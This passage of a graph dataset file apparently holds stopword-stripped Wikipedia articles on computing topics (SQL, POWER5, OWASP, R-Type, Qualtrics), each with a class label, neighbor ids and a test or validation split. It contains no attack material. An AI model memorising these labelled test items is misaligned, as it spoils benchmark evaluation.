classic transfer funds transaction money removed one account added another either removal addition fails entire transaction rolled back data definition language ddl manages table index structure basic items ddl codice_67 codice_68 codice_69 codice_70 codice_71 statements column sql table declares type column may contain ansi sql includes following data types. ref name= iso/iec /ref codice_89 codice_90 data types multipliers codice_91 1 024 codice_92 1 048 576 codice_93 1 073 741 824 codice_94 1 099 511 627 776 optionally used specifying length codice_100 data type multipliers codice_91 1 024 codice_92 1 048 576 codice_93 1 073 741 824 codice_94 1 099 511 627 776 optionally used specifying length codice_47 data type store values codice_107 codice_108 example number 123.45 precision 5 scale 2 precision positive integer determines number significant digits particular radix binary decimal scale non-negative integer scale 0 indicates number integer decimal number scale exact numeric value integer value significant digits divided 10 sql provides functions codice_119 codice_120 round numerical values popular vendor specific functions codice_121 informix db2 postgresql oracle mysql codice_122 informix sqlite sybase oracle postgresql microsoft sql server mimer sql sql function codice_135 used extracting single field seconds instance datetime interval value current system date time database server called using functions like codice_136 codice_137 codice_138 codice_139 popular vendor specific functions codice_140 codice_141 codice_142 codice_143 codice_144 codice_145 codice_146 codice_147 codice_148 codice_149 codice_150 codice_151 data control language dcl authorizes users access manipulate data two main statements example",
    "neighbors": [
      10632,
      8201,
      9871,
      6161,
      8979,
      2068,
      10389,
      7446,
      151,
      2456,
      1049,
      5658,
      5403,
      2972,
      5149,
      2206,
      8854,
      9245,
      9631,
      9634,
      11036,
      5413,
      4263,
      2344,
      6775,
      7080,
      10413,
      10286,
      11056,
      9397,
      3126,
      1079,
      5816,
      10137,
      3004,
      10048,
      5953,
      6977,
      9286,
      8904,
      1610,
      9290,
      8524,
      2901,
      10326,
      2904,
      987,
      2780,
      8539,
      3934,
      4064,
      4065,
      9828,
      6629,
      8421,
      10471,
      8426,
      6124,
      2669,
      5614,
      6383,
      2544,
      10737,
      1010,
      9075,
      3447,
      1146,
      6651,
      2045,
      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 9291,
    "label": 9,
    "text": "Literal_pool:literal pool computer science specifically compiler assembler design literal pool lookup table used hold literals assembly execution multiple local literal pools typically used computer architectures lack branch instructions long jumps set instructions optimized shorter jumps examples architectures include arm architecture ibm system/360 later architectures number instructions took 12-bit address offsets case compiler would create literal table every 4k page branches whose target less 4k bytes away could taken immediately longer branches required address lookup via literal table entries literal pool placed object relocation table assembly resolved link edit time certain ways literal pool resembles toc global offset table got except implementation considerably simpler may multiple literal tables per object perhaps common type literal pool literal pools used codice_1 pseudo-instruction arm assembly language similar instructions ibm system/360 assembly language compiled load pc-relative addressing mode constant stored literal pool often particular constant value used multiple times program many linkers default store unique constant single combined literal pool improves code size java virtual machine string literal pool class constant pool",
    "neighbors": [
      1952,
      6821,
      8037,
      8262,
      6664,
      9932,
      9964,
      10508,
      5872,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 9292,
    "label": 2,
    "text": "Nokia_E61:nokia e61 nokia e61 smartphone eseries range s60 3rd edition device targeting business users european market announced part new eseries business line 12 october 2005 along nokia e60 e70 q4 2006 cingular rogers wireless deployed similar yet restricted version designated nokia e62 north american brazilian markets e62 substantially similar without 802.11 wifi chipset w-cdma umts 3g support e61 supports 900/1800/1900 bands e62 operate 850/900/1800/1900 order support american networks 12 february 2007 nokia announced e61i follow product nokia e61i smartphone eseries range s60v3 device targeting business users european market update nokia e61 released 2006 product announced 12 february 2007 3gsm world congress main differences e61 include",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      10271,
      2208,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      9909,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      4576,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      3561,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9293,
    "label": 4,
    "text": "OWASP:owasp open web application security project owasp online community produces freely-available articles methodologies documentation tools technologies field web application security mark curphey started owasp september 9 2001 jeff williams served volunteer chair owasp late 2003 september 2011. matt konda chaired board owasp foundation 501 c 3 non-profit organization usa established 2004 supports owasp infrastructure projects since 2011 owasp also registered non-profit organization belgium name owasp europe vzw owasp organization received 2014 sc magazine editor choice award",
    "neighbors": [
      899,
      5636,
      8585,
      522,
      10633,
      3604,
      1429,
      7449,
      1179,
      5404,
      2084,
      11567,
      10492,
      11067,
      8764,
      4797,
      2754,
      5314,
      331,
      8526,
      4435,
      4820,
      3552,
      7522,
      483,
      612,
      101,
      4198,
      7526,
      2409,
      6636,
      8176,
      113,
      8956,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9294,
    "label": 9,
    "text": "Adriaan_van_Wijngaarden:adriaan van wijngaarden adriaan aad van wijngaarden 2 november 1916 – 7 february 1987 dutch mathematician computer scientist considered many founding father informatica computer science netherlands even though trained engineer van wijngaarden would emphasize promote mathematical aspects computing first numerical analysis programming languages finally design principles programming languages education mechanical engineering received degree delft university technology 1939 studied doctorate hydrodynamics abandoned area joined nationaal luchtvaartlaboratorium 1945 went group england following year learn new technologies developed world war ii van wijngaarden intrigued new idea automatic computing 1 january 1947 became head computing department brand-new mathematisch centrum mc amsterdam made visits england united states gathering ideas construction first dutch computer arra electromechanical construction first demonstrated 1952 year van wijngaarden hired edsger dijkstra worked software arra visiting edinburgh 1958 van wijngaarden seriously injured automobile accident wife killed recovered focused programming language research one designers original algol later algol 68 developed two-level type grammar became known van wijngaarden grammars became director mc 1961 remained post next twenty years 1959 became member royal netherlands academy arts sciences awarded every 5 years 60th anniversary centrum wiskunde informatica 2006 consists bronze sculpture",
    "neighbors": [
      512,
      8262,
      840,
      1672,
      1610,
      1611,
      3529,
      9224,
      6652,
      6460,
      1783,
      2012
    ],
    "mask": "Test"
  },
  {
    "node_id": 9295,
    "label": 9,
    "text": "Brad_Cox:brad cox brad cox computer scientist known mostly creating objective-c programming language business partner tom love work software engineering specifically software reuse software componentry cox received bachelor science degree organic chemistry mathematics furman university ph.d. department mathematical biology university chicago among first known software projects wrote pdp-8 program simulating clusters neurons worked national institutes health woods hole oceanographic institute moving software profession although cox invented programming language objective-c used early career stated interview masterminds programming book n't interested programming languages rather software components regards languages mere tools building combining parts software cox also entrepreneur founded stepstone company together tom love releasing first objective-c implementation later next acquired objective-c stepstone objective-c continued primary programming language writing software apple os x ios",
    "neighbors": [
      8262,
      10470,
      3733,
      8732,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 9296,
    "label": 5,
    "text": "Acoustic_telegraphy:acoustic telegraphy acoustic telegraphy also known harmonic telegraphy name various methods multiplexing transmitting one telegraph messages simultaneously single telegraph wire using different audio frequencies channels message telegrapher used conventional morse key tap message morse code key pulses transmitted pulses specific audio frequency receiving end device tuned frequency resonated pulses others wire inventors worked acoustic telegraph included charles bourseul thomas edison elisha gray alexander graham bell efforts develop acoustic telegraphy order reduce cost telegraph service led invention telephone thomas edison devices used multiple synchronized tuning forks tuned selected audio frequencies opened closed electrical circuits selected audio frequencies acoustic telegraphy similar concept present-day fdma frequency division multiple access used radio frequencies word acoustic comes greek akoustikos meaning hearing hearing sound waves air acoustic telegraphy devices electromechanical made musical buzzing humming sound waves air feet primary function devices generate sound waves rather generate alternating electrical currents selected audio frequencies wires transmitted telegraphic messages electrically long distances five edison patents assigned western union telegraph company new york",
    "neighbors": [
      3168,
      7490,
      2057,
      7723,
      1969,
      2802,
      2994,
      119,
      2458,
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 9297,
    "label": 7,
    "text": "CloudBees:cloudbees cloudbees provider continuous delivery software services initially cloudbees provided platform service paas build run manage web applications cloudbees supported entire application life-cycle development deployment sacha labourey founded company early 2010 investors include matrix partners lightspeed venture partners verizon ventures cloudbees headquartered san jose ca additional offices lewes de richmond va brussels belgium seville spain neuchâtel switzerland sacha labourey founder ceo cloudbees labourey created company provide developers cloud platform made development java applications faster easier starting cloudbees labourey led jboss europe ultimately becoming chief technology officer remaining role red hat acquisition jboss june 2006 left red hat 2009 founded cloudbees one year later several management core developers coming jboss cloudbees expertise middleware proponent open source september 2014 cloudbees stopped offering runtime paas services order focus solely jenkins tool continuous delivery on-premises cloud kohsuke kawaguchi lead developer founder jenkins project well company cto several jenkins core committers also employed cloudbees 2016 company expanded services releasing private software service saas version continuous delivery platform 2016 cloudbees formed alliance github ca technologies others software development delivery february 2018 cloudbees acquired codeship provider continuous integration continuous delivery ci/cd cloud-based service move company said gives broader portfolio ci/cd solutions organizations sizes support several ci/cd philosophies approaches since 2010 cloudbees raised total 100 million venture financing cloudbees funding cloudbees products enable organizations build test deploy applications production utilizing continuous delivery practices continuous delivery important companies transitioning devops environment cloudbees product family includes enterprise version jenkins cloudbees provides commercial support additional plugins open source jenkins cloudbees jenkins platform includes cloudbees jenkins operations center provides central way manage jenkins across organization masters plugin versions easily maintained resources shared jenkins teams teams use cloudbees jenkins platform version jenkins development deploy popular runtime paas offerings pivotal cf google app engine amazon elastic beanstalk release cloudbees jenkins platform — private saas edition provides enterprises self-service access teams across entire organization software gives enterprises ability access cloudbees jenkins platform private cloud dedicated amazon web services cloudbees clients include range enterprises fortune 500 companies",
    "neighbors": [
      8122,
      6853,
      2795,
      5677,
      7248,
      11221,
      2842
    ],
    "mask": "Test"
  },
  {
    "node_id": 9298,
    "label": 2,
    "text": "Douglas_McIlroy:douglas mcilroy malcolm douglas mcilroy born 1932 mathematician engineer programmer 2007 adjunct professor computer science dartmouth college mcilroy best known originally developed unix pipelines software componentry several unix tools spell diff sort join graph speak tr seminal work software componentization makes pioneer component-based software engineering software product line engineering mcilroy earned bachelor degree engineering physics cornell university 1954 ph.d. applied mathematics mit 1959 thesis solution differential equations conical shells taught mit 1954 1958 mcilroy joined bell laboratories 1958 1965 1986 head computing techniques research department birthplace unix operating system thereafter distinguished member technical staff 1967 1968 mcilroy also served visiting lecturer oxford university 1990s mcilroy worked improving sorting techniques particularly co-authored optimized quicksort algorithm jon bentley 1997 mcilroy retired bell labs took position adjunct professor dartmouth college computer science department mcilroy member national academy engineering usenix lifetime achievement award flame software tools award previously served association computing machinery national lecturer turing award chairman member publications planning committee associate editor communications acm journal acm acm transactions programming languages systems also served executive committee csnet mcilroy attributed quote real hero programming one writes negative code meaning negative code taken similar famous apple developer team anecdote i.e. change program source makes number lines code decrease 'negative code overall quality readability speed improves",
    "neighbors": [
      10881,
      4483,
      9735,
      4492,
      11023,
      2198,
      9507,
      4398,
      8499,
      310,
      823,
      8502,
      8631,
      3134,
      9535,
      7872,
      1987,
      9542,
      7883,
      6617,
      475,
      8414,
      8031,
      8671,
      6369,
      9444,
      6120,
      5357,
      8301,
      8430,
      2035,
      5492,
      1783,
      4859,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9299,
    "label": 9,
    "text": "X3J13:x3j13 x3j13 name technical committee part international committee information technology standards incits named x3 x3j13 committee formed 1986 draw american national standards institute ansi common lisp standard based first edition book common lisp language also termed cltl cltl1 guy l. steele jr. formerly de facto standard language primary output x3j13 american national standard programming language common lisp x3.226/1994 approved december 8 1994 x3j13 later worked international organization standardization iso working group sc22/wg16 internationally standardised dialect lisp named islisp original chair committee doctor robert mathis ohio state university mary van deusen secretary guy l. steele jr. originally vice-chair later years mathis stepped chair steele assumed role efforts committee guided charter successful creation credited coordinating efforts susan p. ennis representative amoco production company charter lays committee goals priorities broadly defined list topics addressed committee formed several subcommittees help members better concentrate efforts cleanup subcommittee chaired larry masinter established standardised format submission proposals voting issue writeups part standard deemed sufficiently useful common lisp hyperspec include cross-reference benefit readers providing information original intent committee decisions writeups also serve historical record alternate solutions problems ultimately adopted chaired sandra loosemore subcommittee created proposals issues relating lisp compiling guy steele acknowledged second edition common lisp language large contribution compiler subcommittee toward clarifying compiling process described first edition parts steele describes vague jon l. white chair iteration subcommittee among issues dealt group generalized codice_1 macro – domain-specific language second edition cltl devotes full chapter algol-like syntax macro differing lisp usual s-expression syntax remains somewhat controversial character subcommittee chaired thom linden task defining standard would deal issues surrounding different character sets resolution matters particularly ability use character name symbol intended make common lisp simpler international users chaired kent pitman error handling subcommittee plugged described biggest outstanding hole common lisp condition system general mechanism handling errors warnings exceptional situations committee referred resulting specification condition system rather error system accommodate one system handling exceptional situations various kinds whether fatal non-fatal whether continuable whether result program error simple resource limit stack overflow conditions signaled one point code may handled another point use term signal different typical operating system notion signals except lisp machines variant use term evolved operating system notion signaling scope committee consequently addressed ansi common lisp standard asynchronous interrupts ieee floating point trapping also scope committee work addressed standard kathy chapman chair drafting subcommittee responsible drafting actual standard document subcommittee oversaw efforts keep terminology consistent accurate throughout committee activities final standard produced x3j13 committee published american national standard x3.226 also hypertext form common lisp hyperspec book common lisp language although authored mostly guy l. steele jr. product ad hoc committee formed around 1980 worked collaboratively produce original de facto standard common lisp formation x3j13 x3j13 began work common lisp language base document proceeded design would become ansi common lisp steele served committee gave permission use parts first edition efforts documents published x3j13 later used together quotations certain committee members production common lisp language second edition released 1990 giving common lisp community way preview many features expected appear committee final standard document edition bears similarity standard content though form however substantive changes made form additions deletions publication book final draft ansi standard sum original edition common lisp language document x3j13 originally based work second edition contrast steele work committee product official status within x3j13 ansi acknowledged second edition preface authorized x3j13 choice content snapshot work progress formally synchronized x3j13 final version reviewed approved x3j13",
    "neighbors": [
      512,
      4097,
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      6201,
      3132,
      6717,
      8258,
      8771,
      1613,
      10841,
      3675,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      1159,
      9865,
      9871,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      9926,
      7880,
      8908,
      205,
      5837,
      7896,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      11083,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255,
      4606
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9300,
    "label": 2,
    "text": "Working_set:working set working set concept computer science defines amount memory process requires given time interval peter denning 1968 defines “ working set information formula_1 process time formula_2 collection information referenced process process time interval formula_3 ” typically units information question considered memory pages suggested approximation set pages process access future say next formula_4 time units specifically suggested indication pages ought kept main memory allow progress made execution process effect choice pages kept main memory distinct paged auxiliary storage important many pages process kept main memory fewer processes ready one time pages process kept main memory page fault frequency greatly increased number active non-suspended processes currently executing system approaches zero working set model states process ram pages currently using often approximated recently used pages ram model nothing model meaning pages needs use increases room ram process swapped memory free memory processes use often heavily loaded computer many processes queued processes allowed run one scheduling time slice would refer pages ram causing computer thrash swapping processes memory result processes—even processes temporarily removed memory—finish much sooner would computer attempted run processes also finish much sooner would computer ran one process time completion since allows processes run make progress times one process waiting hard drive global resource words working set strategy prevents thrashing keeping degree multiprogramming high possible thus optimizes cpu utilization throughput main hurdle implementing working set model keeping track working set working set window moving window memory reference new reference appears one end oldest reference drops end page working set referenced working set window avoid overhead keeping list last k referenced pages working set often implemented keeping track time last reference considering working set pages referenced within certain period time working set n't page replacement algorithm page-replacement algorithms designed remove pages n't working set particular process one example modified version clock algorithm called wsclock working set divided code working set data working set distinction important code data separate relevant level memory hierarchy either working set fit level hierarchy thrashing occur addition code data systems virtual memory memory map virtual memory physical memory entries pages working set must cached translation lookaside buffer tlb process progress efficiently distinction exists code data cached small blocks cache lines entire pages address lookup done page level thus even code data working sets fit cache working sets split across many pages virtual address working set may fit tlb causing tlb thrashing analogs working set exist limited resources significantly processes set processes requires frequent interaction multiple processes must coscheduled order progress processes scheduled simultaneously – example two processes one core execute – processes advance rate one interaction per time slice resources include file handles network sockets – example copying one file another simply done two file handles one input one output thus file handle working set size two one file handle available copying still done requires acquiring file handle input reading say buffer releasing acquiring file handle output writing releasing acquiring input file handle repeating similarly server may require many sockets limited would need repeatedly release re-acquire sockets rather thrashing resources typically required program acquire enough resources simply fails",
    "neighbors": [
      1025,
      3725,
      11539,
      3871,
      3615,
      8624,
      7351,
      3512,
      10813,
      3267,
      4423,
      2250,
      2383,
      5840,
      11343,
      86,
      6624,
      8036,
      9829,
      7273,
      8810,
      4589,
      7032
    ],
    "mask": "Test"
  },
  {
    "node_id": 9301,
    "label": 7,
    "text": "GridRPC:gridrpc gridrpc remote procedure call grid paradigm proposed gridrpc working group open grid forum ogf api defined order clients access remote servers simply function call used among numerous grid middleware simplicity implementation standardized ogf 2007 interoperability reasons different existing middleware api followed document describing good use behavior different gridrpc api implementations works conducted gridrpc data management standardized 2011 scope standard offer recommendations implementation middleware deals following topics among existing middleware application programming approaches one simple powerful flexible approach consists using servers available different administrative domains classical client-server remote procedure call rpc paradigm network enabled servers nes implement model also called gridrpc clients submit computation requests resource broker whose goal find server available grid scheduling frequently applied balance work among servers list available servers sent back client client able send data request one suggested servers solve problem thanks growth network bandwidth reduction network latency small computation requests sent servers available grid make effective use today scalable resource platforms important ensure scalability middleware layers well service-oriented approach new several research projects targeted paradigm past main middleware implementing api diet netsolve/gridsolve ninf environments use like saga interface ogf without standardized api calls like ommirpc xtremweb rpc model internet also used several applications transparently internet large optimization problems solved using different approaches simply filling web page remote image processing computations use mathematical libraries studies heuristics resolution methods sparse linear algebra like gridtlse approach providing computation services internet also highly close service oriented computing soa paradigm core cloud computing one simple yet effective mean execute jobs computing grid use gridrpc middleware relies gridrpc paradigm request gridrpc middleware manages management submission input output data execution job remote resource etc make available service programmer must implement two codes client data defined run user requesting service server contains implementation service executed remote resource one step ease development codes conducted define gridrpc api proposed draft november 2002 open grid forum ogf standard since september 2007 thus gridrpc source code involve specific middleware data compiled executed gridrpc compliant middleware due difference choice implementation gridrpc api document describing interoperability gridrpc middleware also written main goals describe difference behaviour gridrpc middleware propose common test gridrpc middleware must pass discussions undertaken data management within gridrpc middleware draft api proposed ogf'21 october 2007 motivation document provide explicit functions manipulate data exchange gridrpc platform client since 1 size data used grid applications may large useless data transfers must avoided 2 data always stored client side may made available either storage resource within gridrpc platform hence side effect fully gridrpc-compliant code written compiled gridrpc middleware implementing gridrpc data management api gridrpc model pictured following figure communications handled 1 servers register services registry 2 client needs execution service contacts registry 3 registry returns handle client 4 client uses handle invoke service server 5 eventually receives back results mechanisms involved api must provide means make synchronous and/or asynchronous calls service latter clients must also able wait blocking non-blocking manner completion given service naturally involves data structures conducts rigorous definition functions api gridrpc data types three main data types needed implement api 1 grpc_function_handle_t type variables representing remote function bound given server allocated client variable used launch service many times desired explicitly invalidated user needed anymore 2 grpc_session_t type variables used identify specific non-blocking gridrpc call variable mandatory obtain information status job order client wait cancel know error status call 3 grpc_error_t groups kind errors returns status codes involved gridrpc api gridrpc functions grpc_initialize grpc_finalize functions similar mpi initialize finalize calls mandatory gridrpc call performed two calls read configuration files make gridrpc environment ready finish order initialize destruct function handle grpc_function_handle_init grpc_function_handle_destruct functions called function handle dynamically associated server resource discovery mechanisms example call grpc_function_handle_default let postpone server selection actual call made handle grpc_get_handle let client retrieve function handle corresponding session id e.g. non-blocking call previously performed depending type call blocking non-blocking client use grpc_call grpc_call_async function latter client possesses call session id used respectively probe wait completion cancel call check error status non-blocking call issuing unique numerous non-blocking calls client use grpc_probe know execution service completed grpc_probe_or know one previous non-blocking calls completed grpc_cancel cancel call grpc_wait block completion requested service grpc_wait_and block services corresponding session ids used parameters finished grpc_wait_or block service corresponding session ids used parameters finished grpc_wait_all block non-blocking calls completed grpc_wait_any wait previously issued non-blocking request completed talk lib +link code must compile give basic example",
    "neighbors": [
      4194,
      5956,
      7018,
      4107,
      4052,
      8122,
      8702,
      7935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9302,
    "label": 3,
    "text": "POWER5:power5 power5 microprocessor developed fabricated ibm improved version power4 principal improvements support simultaneous multithreading smt on-die memory controller power5 dual-core microprocessor core supporting one physical thread two logical threads total two physical threads four logical threads technical details microprocessor first presented 2003 hot chips conference complete description given microprocessor forum 2003 14 october 2003 power5 sold openly used exclusively ibm partners systems using microprocessor introduced 2004 power5 competed high-end enterprise server market mostly intel itanium 2 lesser extent sun microsystems ultrasparc iv fujitsu sparc64 v. superseded 2005 improved iteration power5+ power5 development power4 addition two-way multithreading required duplication return stack program counter instruction buffer group completion unit store queue thread may resources register files execution units shared although thread sees set registers power5 implements simultaneous multithreading smt two threads executed simultaneously power5 disable smt optimize current workload many resources register files shared two threads increased capacity many cases compensate loss performance number integer floating-point registers increased 120 80 integer 72 floating-point registers power4 floating-point instruction cache also increased capacity 24 entries 20 capacity l2 unified cache increased 1.875 mb set-associativity 10-way unified l3 cache brought on-package instead located externally separate chips capacity increased 36 mb like power4 cache shared two cores cache accessed via two unidirectional 128-bit buses operating half core frequency on-die memory controller supports 64 gb ddr ddr2 memory uses high-frequency serial buses communicate external buffers interface dual inline memory modules dimms microprocessor power5 contains 276 million transistors area 389 mm fabricated ibm 0.13 µm silicon insulator soi complementary metal–oxide–semiconductor cmos process eight layers copper interconnect power5 die packaged either dual chip module dcm multi-chip module mcm dcm contains one power5 die associated l3 cache die mcm contains four power5 dies four l3 cache dies one power5 die measures 95 mm 95 mm several power5 processors high-end systems coupled together act single vector processor technology called viva virtual vector architecture power5+ improved iteration power5 introduced 4 october 2005 improvements initially lower power consumption due newer process fabricated power5+ chip uses 90 nm fabrication process resulted die size decrease 389 mm 243 mm clock frequency increased launch remained 1.5 1.9 ghz 14 february 2006 new versions raised clock frequency 2.2 ghz 2.3 ghz 25 july 2006 power5+ packaged packages previous power5 microprocessors also available quad-chip module qcm containing two power5+ dies two l3 cache dies one power5+ die qcm chips ran clock frequency 1.5 1.8 ghz ibm uses dcm mcm power5 microprocessors system p system server families ds8000 storage server embedded microprocessors high-end infoprint printers dcm power5 microprocessors used ibm high-end intellistation power 285 workstation third-party users power5 microprocessors groupe bull escala servers hitachi sr11000 computers 128 power5+ microprocessors several installations featured 2007 top500 list supercomputers ibm uses power5+ system p5 510q 520q 550q 560q servers",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      9739,
      1548,
      1933,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9126,
      9391,
      10543,
      4017,
      5297,
      7218,
      10675,
      8120,
      6715,
      9020,
      1725,
      2877,
      1983,
      6464,
      1985,
      8899,
      10180,
      8136,
      336,
      8530,
      3540,
      342,
      731,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      3431,
      10985,
      10734,
      1776,
      3185,
      4211,
      5235,
      630,
      1913,
      8058,
      3323,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9303,
    "label": 3,
    "text": "R-Type:r-type r-type first game run irem 16-bit m72 arcade system initially joke among staff force based dung beetles development team drew inspiration gradius aliens works h.r giger music composed masato ishizaki character design done akio game title stems word ray ray light reference player ray-like weapons used throughout game r-type celebrated critics graphics addictive gameplay although would receive criticism high difficulty level commonly cited one best shoot-em-up video games well one greatest video games time success would prompt creation several sequel spin-off games alongside home ports releases digital distribution services remake game released r-type dx game boy color 2000 3d remake r-type dimensions released xbox 360 2009 later nintendo switch 2018 game composed several sequential levels boss enemy end player controls small spacecraft must navigate terrain fight enemies using various ship weapons player spacecraft default weak rapid-firing main gun powerful gun called wave cannon requires player hold fire build power cannon game player obtain auxiliary device called force resembles glowing orange ball force attached front back player spacecraft detached fly freely attached force provides one three different powerful weapons addition main gun wave cannon detached weapons used force instead resort secondary set guns fired player even force distance spacecraft force secondary use shield completely indestructible block things fired well damage destroy enemies contact inspiration force came partly joke akibo designer envisioning behavior dung beetle r- series title stands ray ray light reference many different types ray-like weapons players use series another theory suggests r-type refers bydo r-strategists r/k selection theory original r-type well received gaming critics however also infamous relentless difficulty zx spectrum version r-type awarded 9/10 january 1989 issue sinclair placed number 6 sinclair official top 100 games machine praised incredible use colour blows away almost every shoot'em spectrum crash congratulated electric dreams retaining frenetic arcade feel producing brilliant game sinclair user praised weapons system difficulty curve c+vg concluded review saying excellent shoot'em challenging addictive absolute must spectrum blasting fanatics r-type placed number 1 rgtv youtube video top 5 shoot 'em ups zx spectrum successful 1988 port master system immediately recognized one best games available sega library mean machines magazine review praised particular graphics high quality challenge offered game awarding overall rating 92 1995 article next generation stated pc engine conversion irem arcade smash r-type still regarded system definitive contribution shoot 'em genre following year listed arcade original ports game number 98 top 100 games time praising art direction graphics design innovations huge bosses retrospective review allgame editor shawn sackenheim described turbografx-16 version r-type accurate home conversion arcade version game furthermore stating shooter started still thrill ride beginning end game runner-up category best coin-op conversion year golden joystick awards behind operation wolf hudson soft developed fairly accurate port r-type released pc engine turbografx 16 consoles although versions suffered slightly lower resolution reduced colour palette sprite flickering slowdown due slightly reduced resolution playfield also scrolls slightly vertical axis whenever player ship approaches top bottom screen japanese release pc engine split across two game cards hucards titled later north american release turbografx-16 contained entire game single card pc engine version r-type notable boss end stage 6 rather prolonged wave enemies versions xbox live arcade game r-type dimensions released february 4 2009 tozai games port original r-type sequel r-type ii played either original 2d graphics new 3d graphics added co-op gameplay functionality analogous version ps3 released may 2014 name r-type dimensions pc engine version r-type one first games confirmed nintendo virtual console north american european versions include eight levels released turbografx-16 japanese release wii split two downloads mirroring original format game pc engine however japanese releases nintendo 3ds wii u use turbografx-16 version instead pc engine one master system version became available well virtual console japan may 19 2009 north america november 2 2009 europe september 25 2009 however due licensing issues version delisted september 30 2011 north america europe october 18 2011 japan 2010 dotemu developed ios port r-type published electronic arts released also android september 2011 tozai games returned 2018 re-issued updated digital-only release r-type dimensions carrying title r-type dimensions ex landing steam playstation 4 nintendo switch.. strictly limited games released physical copies playstation 4 nintendo switch versions february 2019 limited 2,000 3,000 copies respectively collector edition variants also issued contained hardcover artbook dog tags stickers cards limited 1,000 playstation 4 2,000 nintendo switch irem developed number sequels related games including r-type ii armed police unit gallop xmultiply although part series similar themes gameplay released around time r-type ii however games katakis 1988 clone produced factor 5 commodore 64 amiga 1991 konami released xexex game heavily influenced r-type xmultiply game used similar weapons concepts flint combination r-type force x multiply tentacle equipment games similar r-type rezon released allumer 1991 aicom pulstar blazing star later published yumekobo neo geo technosoft 1992 title thunder force iv sega mega drive",
    "neighbors": [
      7234,
      11557,
      3915,
      9006,
      10931,
      4405,
      6390
    ],
    "mask": "None"
  },
  {
    "node_id": 9304,
    "label": 9,
    "text": "Programming_Languages:_Application_and_Interpretation:programming languages application interpretation programming languages application interpretation plai free programming language textbook shriram krishnamurthi use 30 universities several high-schools book differs programming language texts attempt wed two different styles programming language education one based language surveys another based interpreters former style easy ignore difficult technical points sometimes best understood trying reproduce via implementation latter easy miss high-level picture forest details plai therefore interleaves two using survey approach motivate ideas interpreters understand book accompanied supporting software runs racket programming language since plai constantly development newer material especially assignments found course pages brown university plai also experiment publishing methods essay books software discusses book self-published addition book currently december 2014 available for-pay print also free for-pay electronic editions",
    "neighbors": [
      2666,
      4867,
      10324,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 9305,
    "label": 7,
    "text": "Qualtrics:qualtrics qualtrics experience management company co-headquarters provo utah seattle washington united states company founded 2002 scott m. smith ryan smith jared smith stuart orgill qualtrics offers subscription software platform world ’ iconic companies use close experience gaps deliver breakthrough results xm platform makes simple organization collect understand take action experience data x-data —the beliefs emotions sentiments customers employees november 11 2018 announced qualtrics would acquired sap acquisition completed january 23rd 2019 2012 company received 70 million series investment sequoia capital accel generally considered two top venture capital firms country largest joint investment date two firms september 2014 sequoia capital accel returned series b funding led insight partners worth 150 million record utah-based company valuing company 1 billion april 2017 qualtrics received series c investment round 180 million returning investors accel sequoia capital insight venture partners series c raised 2.5 billion pre-money valuation lifetime qualtrics raised total 400 million accel insight partners sequoia capital october 19 2018 qualtrics filed s-1 registration statement intention raising gross proceeds 200 million initial public offering ipo class b shares time company listed 9,000 global customers company meant listed nasdaq exchange ticker xm reference flagship experience management product qualtrics xm platform plans ipo scrapped announced november 2018 qualtrics would acquired sap nyse sap 2016 qualtrics ranked 12 forbes cloud 100 list moving 6 2017 qualtrics reported revenue 190.6 million 2016 289.9 million 2017 representing year year growth 52 2016 qualtrics reported overall net loss 12 million free cash flow 3.4 million 2017 qualtrics reported 2.6 million net profit free cash flow 21.3 million may 2016 qualtrics acquired statistical analysis startup statwing undisclosed sum statwing san francisco-based company created point-and-click software advanced statistical analysis april 2018 qualtrics acquired delighted undisclosed sum delighted 1,500 customers time acquisition november 2018 sap announced intent acquire qualtrics sap acquired outstanding shares qualtrics 8 billion usd cash deal sap secured €7 billion financing time announced qualtrics acquisition sap second-biggest purchase ever behind 8.3 billion acquisition travel expense management firm concur 2014 acquisition formally closed january 23 2019 quantitative statistical analysis performed qualtrics cited number professional academic journals qualtrics became first employee management platform measuring employee experiences key metrics powered predictive intelligence researchers often use qualtrics survey tool combine spss analyze survey data employee experiences many types survey data",
    "neighbors": [
      4107,
      8779,
      6737,
      5268,
      2328,
      5210,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 9306,
    "label": 2,
